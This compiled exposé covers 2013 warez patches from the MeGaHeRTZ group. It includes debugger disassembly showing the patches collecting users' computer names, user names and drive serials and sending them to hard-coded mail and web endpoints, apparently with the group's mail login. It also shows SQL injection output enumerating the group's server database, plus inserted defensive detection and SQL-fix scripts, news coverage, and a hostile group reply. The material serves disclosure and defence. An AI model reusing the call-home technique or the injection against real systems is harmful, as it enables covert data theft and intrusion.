Scene Group "MEGAHERTZ" Exposed Gathering Intel on People Using Their Patches



I downloaded a release from MeGaHeRTZ earlier but noticed quickly that the firewall went off as it attempted to do communication on port 25. Strange, so I started to debug this and quickly realized that their patch was far from a simple patch - it had been coded to gather information from the computer it was installed on, and then send that information to predefined email accounts.

2013-04-16 - Malwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ

Now, why would you reference WINSOCK.DLL in a patch? Let's see what we can find when we look at this patch in a debugger.

00404462  |.  50            PUSH EAX
00404463  |.  68 01000000   PUSH 1
00404468  |.  68 9AAB4700   PUSH megahert.0047AB9A        ;  ASCII "http://"
0040446D  |.  E8 5E020400   CALL megahert.004446D0
00404472  |.  50            PUSH EAX
00404473  |.  50            PUSH EAX
00404474  |.  68 01000000   PUSH 1
00404479  |.  68 32000000   PUSH 32
0040447E  |.  E8 E8070300   CALL megahert.00434C6B
00404483  |.  E8 0A040400   CALL megahert.00444892

004042DF  |.  50            PUSH EAX
004042E0  |.  68 0DA14700   PUSH megahert.0047A10D        ;  ASCII "%20"
004042E5  |.  68 09A14700   PUSH megahert.0047A109
004042EA  |.  8B5424 10     MOV EDX,DWORD PTR SS:[ESP+10]
004042EE  |.  E8 DD030400   CALL megahert.004446D0
004042F3  |.  50            PUSH EAX
004042F4  |.  E8 F7030400   CALL megahert.004446F0
004042F9  |.  BA 09A14700   MOV EDX,megahert.0047A109
004042FE  |.  E8 ED030400   CALL megahert.004446F0
00404303  |.  8B5424 18     MOV EDX,DWORD PTR SS:[ESP+18]
00404307  |.  E8 E4030400   CALL megahert.004446F0
0040430C  |.  BA 59A84700   MOV EDX,megahert.0047A859        ;  ASCII " | Computer name: '"
00404311  |.  E8 DA030400   CALL megahert.004446F0
00404316  |.  E8 B5030400   CALL megahert.004446D0
0040431B  |.  50            PUSH EAX
0040431C  |.  50            PUSH EAX
0040431D  |.  E8 DE780000   CALL megahert.0040BC00
00404322  |.  58            POP EAX
00404323  |.  BA 85A44700   MOV EDX,megahert.0047A485        ;  ASCII "' - User: '"
00404328  |.  E8 C3030400   CALL megahert.004446F0

So - why would a patch need to gather username, computer name and IP address? Let's take a look at what it puts together:

Malwarebytes Anti-Malware Pro v1.x | Computer name: '*E****-D*F6****' - User: 'Administrator'.

The computer name is actually the drive serial gathered from the Windows API; and then this is sent to:

- [email protected]
- [email protected]

A backup email running at:

- [email protected]

The emails were sent through http://mhzgroup.altervista.org/SendMailText.php which has since been shut down due to abuse - so it's likely they gathered quite a bit of information.

Did these guys get infected and unknowingly send out malware? Definitely not, this was deliberately made - you can find similar approaches in several of their releases and thus it's important that sites and users are aware that if you use their releases, you are indeed using and installing malware.

NOTE: Several of their releases were checked and contained the same methods, so this is not just a random incident!

Nuke and Wipe these releases and make sure that the group no longer is able to be raced on sites.

TAKE OUT THE TRASH; TODAY!
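As an added example (not part of the notice above and not MeGaHeRTZ code), here is a small static triage script in Python that applies the notice's own reasoning to a raw file image: a patcher that references host-identification APIs, a socket library, and a hard-coded mail server or URL all at once is flagged as a call-home candidate. The API and DLL names are real Win32 identifiers; the sample byte strings are constructed from the strings quoted in the notice and are not taken from a real file.

```python
import re

# Real Win32 import names a licence patcher has no business calling: they
# return the machine name, the logged-in user and the volume (drive) serial.
HOST_INFO_APIS = [
    b"GetComputerNameA", b"GetComputerNameW",
    b"GetUserNameA", b"GetUserNameW",
    b"GetVolumeInformationA", b"GetVolumeInformationW",
]
# Socket / HTTP libraries and entry points (real names, matched case-insensitively).
NETWORK_MARKERS = [
    b"WINSOCK.DLL", b"WSOCK32.DLL", b"WS2_32.DLL", b"WININET.DLL",
    b"WSAStartup", b"InternetOpenA", b"HttpSendRequestA",
]
# Hard-coded remote destinations: an SMTP relay host, a URL, or a mail recipient.
ENDPOINT_PATTERNS = [
    re.compile(rb"smtp\.[A-Za-z0-9.-]+"),
    re.compile(rb"https?://[\x21-\x7e]+"),
    re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
]


def find_indicators(blob: bytes) -> dict:
    """Collect the three indicator classes present in a raw file image."""
    upper = blob.upper()
    endpoints = {
        hit.decode("latin-1") for pat in ENDPOINT_PATTERNS for hit in pat.findall(blob)
    }
    return {
        "host_info": sorted(a.decode() for a in HOST_INFO_APIS if a in blob),
        "network": sorted(m.decode() for m in NETWORK_MARKERS if m.upper() in upper),
        "endpoints": sorted(endpoints),
    }


def classify(findings: dict) -> str:
    """Host identity + network capability + a fixed destination is the
    call-home pattern the notice describes; either of the last two alone
    only says the file is able to talk to the network."""
    if findings["host_info"] and findings["network"] and findings["endpoints"]:
        return "call-home"
    if findings["network"] or findings["endpoints"]:
        return "network-capable"
    return "clean"


# Constructed sample images (not real files): NUL bytes stand in for the
# terminators a real binary would have around its strings.
SAMPLE_PATCH = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"WINSOCK.DLL\x00GetComputerNameA\x00GetUserNameA\x00"
    + b"Malwarebytes Anti-Malware Pro v1.x | Computer name: '\x00"
    + b"smtp.mail.yahoo.com\x00"
    + b"http://mhzgroup.altervista.org/SendMailText.php\x00"
)
SAMPLE_PLAIN_PATCH = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"KERNEL32.DLL\x00ReadFile\x00WriteFile\x00SetFilePointer\x00"
)

if __name__ == "__main__":
    for name, blob in (("megahertz-like", SAMPLE_PATCH), ("plain", SAMPLE_PLAIN_PATCH)):
        found = find_indicators(blob)
        print(f"{name}: {classify(found)} {found}")
```

The combination is what matters: a patcher that only touches files reads as "clean", a self-updating tool reads as "network-capable", and only the three-way match reproduces the pattern the firewall alert exposed here. On a real sample the same checks would be run over the import table and string dump rather than a hand-built byte string.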
---------------8<-------[CUT HERE]-----------------------------------------------------
Releaser: Xylitol/REDWeb
Scene warning: 02 September 2013
Before "MEGAHERTZ.EXPOSED.GATHERING.INTEL.ON.PEOPLE.REMOVE.THEM.V2013.READ.NFO-SNOWDEN"
Attachment: SQL Dump of the lamers, 0day scene should know about this.
---------------8<-------[CUT HERE]-----------------------------------------------------

Hey guys, I recently came across a scene release done by team MeGaHeRTZ:
"Malwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ"
First time I hear of them... and after some searching.. this team worries me.
Their ethics are "misaligned" and the quality isn't really here.

At first let's talk about the quality.
I've searched a bit about this team and found an NFO from 2009:

[MeGaHeRTZ ASCII-art logo]

ReLeaSe iNFo
  SoFT NaMe: iDailyDiary Professional v3.52
  uRL: http://www.splinterware.com
  WoRKeR: ALAN^MeGaHeRTZ
  ReLeaSe TYPe: Cracked EXE
  CRaCKiNG DaTe: 2009/01/20

SoFTWaRe iNFo
  iDailyDiary provides a simple interface that immediately gets you started taking daily notes, creating a journal, putting your thoughts into writing and much more.

iNSTaLL NoTeS
  Install the Software
  Check if the Software *IS NOT* Running
  Use the *CRACK* button to Register

MeGaHeRTZ TeaM
  ALAN - FouNDeR/CRaCKeR/CoDeR/WeB {aMY+PC}
  BaTMaN - GFX {aMY+PC+MaC}
  BiLLY THe KiD - WaReZ GaMeS+MoVie+XXX {PC}
  CoBRa - WaReZ MoVie+GaMeS {PC+CoNSoLe}
  GuMP - WeBDeSiGNeR {PC}
  LaZaRuS - CoDeR {LiNuX}
  NeMBo KiD - WaReZ MoVie+SoFT {PC}
  RiGeL - WaReZ MoVie+GaMeS {PC}
  SHaDiNG - CoDeR {LiNuX}
  SuBCuZZ - CoDeR {PC}
  Toi - WaReZ GaMeS {PC+CoNSoLe}
  ToYBoX MaN - WaReZ MoVie+TooNS+XXX {PC}
  TuLiPaNo NeRo - CoDeR+GFX {PC}
  ViCu - WeBDeSiGNeR {PC+MaC}
  Y-PRoF - CoDeR STuDeNT {PC+LiNuX}

oLD MeGaHeRTZ TeaM / NoW ReTiReD
  aDiDaS - WaReZ GaMeS+SoFT {aMY+PC}
  aNDRo - WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe}
  CYBeRMaSTeR - WaReZ GaMeS+SoFT {aMY+PC+MaC}
  DaNGeRouS - WaReZ GaMeS {aMY}
  eNiGMa - WaReZ GaMeS+SoFT {aMY+PC+MaC}
  GiaNX - WaReZ GaMeS STuDeNT {aMY}
  HaWK - GFX {PC}
  HYRoSHiMa - WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe}
  KiNG WoLF - WaReZ GaMeS STuDeNT {aMY}
  KYX - WaReZ GaMeS+SoFT {aMY+PC+LiNuX}
  L-STYLe - WaReZ GaMeS {aMY}
  LoRD MaRiaN - WaReZ GaMeS {aMY}
  MaD MaX - WaReZ GaMeS STuDeNT {PC}
  MaRaDoNa - WaReZ GaMeS STuDeNT {C64}
  MiSTeR TaPPaRo - WaReZ GaMeS {aMY+PC}
  MiSTeR X - WaReZ SoFT {aMY+PC}
  SuKeBe - WaReZ GaMeS {aMY}
  WaLCoM - WaReZ SoFT {aMY+PC}
  XiaN - WaReZ GaMeS+SoFT {aMY+PC+CoNSoLe}

CoNTaCTS
  MaiL: [email protected]
  WeBSiTe: http://mhzgroup.true.ws
  MeSSeNGeR: [email protected]

GReeTiNG
  ACME - AGAiN - AGGRESSiON - ARN - ArTeam - Bidjan - CHiCNCREAM - C.O.R.E.
  CROSSFiRE - CRUDE - diGERATi - dT - ECLiPSE - f4cg - F.F.F.
  FOSI - ICU - iNFECTED - iNFERNO - LasH - LUCiD - Lz0 - MP2K - NiTROUS
  PARADOX - SCOTCH - SnD - SSG - RESURRECTiON - TMG - TSRh - UIC
  UnderPL - VDown - ViRiLITY - YAG - Z.W.T
=n

MeGaHeRTZ looks like a 0day group, I don't know with whom they are affiliated but... Look at the NFO, it seems to be a well structured group; I've searched and never saw a video or a game release from them.
Also, I don't know the Italian scene well, so I'm not the best to talk about Italian groups. The only guy I've heard of is Rigel (who moved to TSRh if I remember).
Well, let's skip the member list part and see the "greetings" part.
"AGGRESSiON - ARN": ARN is the acronym of Aggression, so why are they in there twice?
And these chars at the end, '=n': why do they have a sort of byte-order mark on the NFO, an error maybe?

Let's have a look at the NFO of the concerned release now (Malwarebytes):

[MeGaHeRTZ ASCII-art logo]

*PRESENTS A NEW 0-DAY RELEASE*
SoFT NaMe ........................... Malwarebytes.Anti-Malware.Pro.v1.75.0.1300
ReLeaSe-TyPe .............................................................. uTiL
oS ...................................................................... WiNaLL
WeBSiTe ........................................... http://www.malwarebytes.org/
CRaCKeD By............................................................. MoS 6510
CRaCK-TyPe ........................................................ *PaTCH V1.0*
PuBLiSHeD oN ........................................................ 2013/04/16
DeSCRiPTioN:
aCTiVeLy PRoTeCT aGaiNST aLL FoRMS oF MaLWaRe
iMPRoVe youR PRoTeCTioN WiTHouT CHaNGiNG youR aV
ReNoWNeD PRoTeCTioN aND CLeaNuP TeCHNoLoGieS
TooL MoST ReCoMMeNDeD By TeCHS aND SuPeR uSeRS
iNSTaLL NoTeS:
1) iNSTaLL *SoFTWaRe* aND iF aSK DoN'T RuN/ReBooT
2) MaKe SuRe THaT SoFTWaRe iS *NoT* RuNNiNG
3) eXeCuTe *MeGaHeRTZ* aND CLiCK oN *PaTCH* BuTToN
,î+4

Simple, clean. ",î+4" Same shit here, I don't know how they package their releases but they have a problem.

Now after the sloppy NFOs we have the sloppy releases:
MeGaHeRTZ is on the 0day scene.. that's ok. Did they even know the 0day scene rules?
"DVDFab.9.v9.0.2.6.Incl.Loader-MeGaHeRTZ"
A Loader... are these guys serious? This release got nuked for this.
But it's a double fail: the release doesn't even work properly (can't convert multiple audio tracks on Blu-ray ripping).
Something weird: you can't close it (to close the release you need to successfully patch the application). Otherwise you have to kill the process...

What happens when you use their patch?
Users who use their releases are tracked for internal statistics.
You don't believe me? Ok, just read the strings:

0040BC2D  .  50            PUSH EAX                        ; /pBufferSize
0040BC2E  .  8B4424 08     MOV EAX,DWORD PTR SS:[ESP+8]    ; |
0040BC32  .  50            PUSH EAX                        ; |Buffer
0040BC33  .  E8 92F40500   CALL 0046B0CA                   ; \GetComputerNameA

0040BC9E  .  50            PUSH EAX                        ; /pBufCount
0040BC9F  .  8B4424 04     MOV EAX,DWORD PTR SS:[ESP+4]    ; |
0040BCA3  .  50            PUSH EAX                        ; |Buffer
0040BCA4  .  E8 5D240600   CALL 0046E106

Shit is parsed like this:
ASCII "Malwarebytes Anti-Malware Pro v1.x | Computer name: 'XYL2K-E87171510' - User: 'Administrateur'"
Then they replace the spaces by '%20', hex encoded for the web.
ASCII "http://usages.kickme.to"

Mail proc:
0040454C  |.  68 90A84700   PUSH 47A890                     ; ASCII "smtp.mail.yahoo.com"
00404551  |.  E8 46890200   CALL 0042CE9C                   ; Dumped_.0042CE9C
00404556  |.  89C3          MOV EBX,EAX
00404558  |.  83FB 01       CMP EBX,1
0040455B  |.  0F85 C4010000 JNZ 00404725                    ; Dumped_.00404725
00404561  |.  E8 6A010400   CALL 004446D0                   ; Dumped_.004446D0
00404566  |.  50            PUSH EAX
00404567  |.  68 CBA74700   PUSH 47A7CB                     ; ASCII "alanmhz"
0040456C  |.  68 30A04700   PUSH 47A030                     ; ASCII "mhz_group_check"

There is the same mail address "[email protected]" on the MeGaHeRTZ NFO of 2009.
And for the password 'alan'.. if you read the 2009 NFO this guy is the founder.

ASCII "http://mhzgroup.altervista.org/usageupdate.php?soft=Malwarebytes Anti-Malware Pro&ver=v1.x"

There is no backconnect facility, C&C and co. but... grabbing the PC name and current user for release tracking? Why?!
And the most dramatic thing is that they don't know how to code properly in PHP...
They are vulnerable to SQL injection; for a 0day team it's really lame.

current database: 'my_megahertzng'
current user: 'megahertzng@localhost'
privilege: USAGE
privilege: USAGE
[*] information_schema
[*] my_megahertzng

Database: my_megahertzng
[4 tables]
+---------+
| release |
| diary   |
| request |
| uses    |
+---------+

Table: uses
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| build    | varchar(50)  |
| id       | int(11)      |
| softname | varchar(100) |
| uses     | int(11)      |
+----------+--------------+

Table: request
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| user     | varchar(50)  |
| note     | varchar(200) |
| softname | varchar(100) |
| status   | varchar(100) |
+----------+--------------+

Table: diary
[4 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| date      | date         |
| softname  | varchar(100) |
| softpatch | varchar(200) |
| type      | int(11)      |
+-----------+--------------+

Table: release
[7 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| date      | date         |
| build     | varchar(50)  |
| id        | int(11)      |
| patch     | varchar(50)  |
| requested | varchar(50)  |
| softhouse | varchar(50)  |
| softname  | varchar(100) |
+-----------+--------------+

I'm not here to do a drama scene, but people should know about this group and their 'tracked' releases.

Last fun thing is from MalwareBytes: they are known for adding signatures on keygens and patches, usually MalwareBytes does 'Dont.Steal.Our.Software':
Malwarebytes.Anti-Malware.1.46.keygen-SND: Dont.Steal.Our.Software
Malwarebytes.Anti-Malware.Pro.v1.75.0.1300.Incl.Patch-MeGaHeRTZ: Trojan.CallHome.Mhz
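The notice reports that the group's usageupdate.php endpoint is vulnerable to SQL injection and shows the `uses` table it feeds. As an added illustration (not the group's code, which is not on the page), the following Python/sqlite3 snippet reconstructs a hypothetical usage counter over that table in the broken form, with the request's soft= and ver= values spliced into the SQL text, next to the parameterised form that fixes it. The table layout follows the dump above; the handler names and the SQLite schema types are assumptions.

```python
import sqlite3

# Columns taken from the `uses` table in the dump; SQLite types are the
# closest equivalents of the MySQL ones shown there.
SCHEMA = """
CREATE TABLE uses (
    id       INTEGER PRIMARY KEY,
    softname VARCHAR(100) NOT NULL,
    build    VARCHAR(50)  NOT NULL,
    uses     INTEGER      NOT NULL DEFAULT 0
);
"""


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def record_use_unsafe(conn: sqlite3.Connection, soft: str, ver: str) -> None:
    """Hypothetical reconstruction of the broken pattern: the request values
    are pasted into the statement text, so any quote character in them
    becomes part of the SQL grammar instead of part of the data."""
    cur = conn.execute(
        f"UPDATE uses SET uses = uses + 1 WHERE softname = '{soft}' AND build = '{ver}'"
    )
    if cur.rowcount == 0:
        conn.execute(
            f"INSERT INTO uses (softname, build, uses) VALUES ('{soft}', '{ver}', 1)"
        )
    conn.commit()


def record_use_safe(conn: sqlite3.Connection, soft: str, ver: str) -> None:
    """Same counter with bound parameters: the driver passes the values to
    the engine separately, so they can never alter the statement."""
    cur = conn.execute(
        "UPDATE uses SET uses = uses + 1 WHERE softname = ? AND build = ?", (soft, ver)
    )
    if cur.rowcount == 0:
        conn.execute(
            "INSERT INTO uses (softname, build, uses) VALUES (?, ?, 1)", (soft, ver)
        )
    conn.commit()


def usage_count(conn: sqlite3.Connection, soft: str, ver: str) -> int:
    row = conn.execute(
        "SELECT uses FROM uses WHERE softname = ? AND build = ?", (soft, ver)
    ).fetchone()
    return row[0] if row else 0


def unsafe_breaks_on(conn: sqlite3.Connection, soft: str, ver: str) -> bool:
    """True when the string-built statement no longer even parses for this input."""
    try:
        record_use_unsafe(conn, soft, ver)
    except sqlite3.OperationalError:
        conn.rollback()
        return True
    return False


if __name__ == "__main__":
    db = new_db()
    record_use_safe(db, "Malwarebytes Anti-Malware Pro", "v1.x")
    record_use_safe(db, "O'Reilly Tool", "v2")          # constructed name with a quote
    print("safe handles quote:", usage_count(db, "O'Reilly Tool", "v2"))
    print("unsafe breaks on quote:", unsafe_breaks_on(db, "O'Reilly Tool", "v2"))
```

A single apostrophe in a product name is enough to make the string-built version fail, and the same mechanism is what lets a crafted value run arbitrary queries against the backing database; the parameterised version treats the apostrophe as data. Every query that takes request input, including the other three tables in the dump, needs the same treatment.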


public Source: http://scenenotice.org

Previous info:

Source: scenenotice.org

:) Those are links to the notice I posted. Here is the link to the NFO and the source of your original article:


source: scenenotice.org

I didn't understand all that much here, but if I have a MeGaHeRTZ cracked app on my PC, will uninstall with Revo be enough, or do I need to re-format?

From the article it's clear their releases don't work, but it's better to uninstall and use another fix from another group. You should definitely delete the fix you downloaded. Reformatting should be unnecessary.

Ok, thanks.

Piracy Release Group Has Been Spying on Downloaders For 9 Months

While viruses and malware can be added to any file online, it is rare for malicious content to be planted by those in the so-called warez scene. Nevertheless, it has now been revealed that since February 2013 one particular group has been dropping a little something extra into its cracked software releases. Anyone who has installed the group’s software patches may well have had their username, hard drive serial, computer name and IP address emailed out without their knowledge.


If the RIAA and MPAA are to be believed, torrent and other file-sharing sites are incredibly dangerous places. Anyone visiting them should be prepared to become infected with a virus, infiltrated by malware, or be otherwise exposed to similar threats.

The actual situation is nowhere near as bad as some would like to make out, but every now and again something happens to remind us that it is very possible for something nasty to slip through the net.

On February 12, 2013 a new warez group appeared calling themselves MeGaHeRTZ. Their first release was BurnAware Professional v6.0 plus a patch to remove the software’s protection. Over the months that followed the group released a lot of noteworthy products such as SmartFTP, DVDFab, FlashFXP, Incredimail, Traktor and hundreds more, each with the obligatory ‘freebie’ patch.

Tomorrow the group will have been operating for a full nine months and during that time their releases have spread to every corner of the Internet. However, far from merely wanting to do downloaders a favor, MeGaHeRTZ have been playing a little dirty.

A small sample of MeGaHeRTZ releases


Over the weekend a notice spread around the warez scene which detailed how one individual became alarmed by unusual firewall activity after he had installed, ironically, a MeGaHeRTZ release of Malwarebytes Anti-Malware Pro.

The problem reportedly came from a patch that MeGaHeRTZ supplied with the release, which attempted to send out traffic on port 25, a port commonly used to send email. The same individual who found the strange activity then ran the patch through a debugger and to his alarm found that it was harvesting information from the host machine.

The data being gathered from infected machines includes the username, computer name/drive serial obtained from the Windows API, and the host machine’s IP address. This information is then packaged up and sent off to any of three predetermined email addresses, all of which have account names containing some variation of the MeGaHeRTZ group name.

Further tests were carried out on several other MeGaHeRTZ releases and they were all found to carry similar mechanisms for pulling data from host machines and funneling it back to the release group.

The scene reacts – all MeGaHeRTZ releases get nuked


Quite what MeGaHeRTZ intend to do with the data is unclear but it appears that as an active release group they are now finished, at least under their current identity. On Saturday the warez scene took action to ‘nuke’ every MeGaHeRTZ release, which means they won’t be allowed to release anymore.

Revealing malware in scene releases is a very unusual occurrence and malicious content is usually added at a later stage by third parties. Still, the damage has now been done. MeGaHeRTZ releases are now all over the Internet and there is nothing that anyone can do to get them back. Avoidance is the only solution now.

Source: TorrentFreak

We are here to reply about unjustified charges contained in this document:

We don't steal any data from PC users, we simply use PC NAME and PC USER O.S.
functions, as you can see in this well-explained document, to create an
internal database of all our patches and unique users; this is only for
statistical purposes and to give us feedback on real useful software
and real useless ones.
We are really sorry for this trouble and we have already fixed our patcher
to send us only software name and software build from the upcoming next
releases; we don't read any data from the PC user anymore, you can see yourself
using any HTTP packet analyzer.
We were born in 1991 when the internet did not exist, we simply sent our releases
by floppy only to our friends, only in the last few years we made some works
published on the internet without publicizing them, and only lately we
publish something on the 0-day scene.
If the 0-day scene doesn't want us anymore it is not a problem, we continue to send our
works over the internet in all possible ways.
We have a lot of people, who know how to personally contact us, that
continuously ask us for custom software requests, so scene distribution is
not a real problem for us.
If the scene can give us another chance we will be happy for this.
But please don't tell that our team is linked with PRISM, Snowden or any
type of American spy systems. God kill the Americans.
About the NFO last bytes, they are simply the CRC check of the file; if it is corrupt
or modified by anyone the patcher does not work, it is only to avoid
lamer capture of our releases.

They can lick my hairy b@lls. :)

I don't have any knowledge at all about making software or patches, but what does PC Name have to do with usage statistics? Even if it's only for statistical purposes, shouldn't they make some kind of option to opt in or out like some software does?

we don't read anymore any data from pc user

What, they didn't realize what a no-no this was before? Especially in the current privacy climate? Collecting/stealing personal info and then emailing it under the radar without the user being aware of it or having any way of stopping it, that's just what malware/adware/keyloggers do. Saying "we won't do it anymore" after being caught red handed, they must really be stupid. Or think we are stupid.

God kill the americans.

:mellow: :blink: :wtf:

MeGaHeRTZ warez group silently spreading malware


File-sharing sites and torrents are dangerous places by definition, as one can easily become infected with a nasty virus. It is rare for the so-called warez scene to expose its users to malware directly; usually it’s added later by third parties. Unfortunately not all groups seem to play by these rules: As of Saturday, all releases by a group called MeGaHeRTZ were officially nuked by the warez community for embedding malware in scene releases and harvesting information from host machines. Ironically, the first user to report unusual activity had just installed a MeGaHeRTZ release of Malwarebytes Anti-Malware Pro. Since February, dozens of infected MeGaHeRTZ “crack” patches have been extracting data from host machines including username, computer name, drive serial obtained via the Windows API, and IP address. As there is no way to delete every single copy of these “tainted” releases that are now spread all over the World Wide Web, avoidance of such releases is strongly recommended.

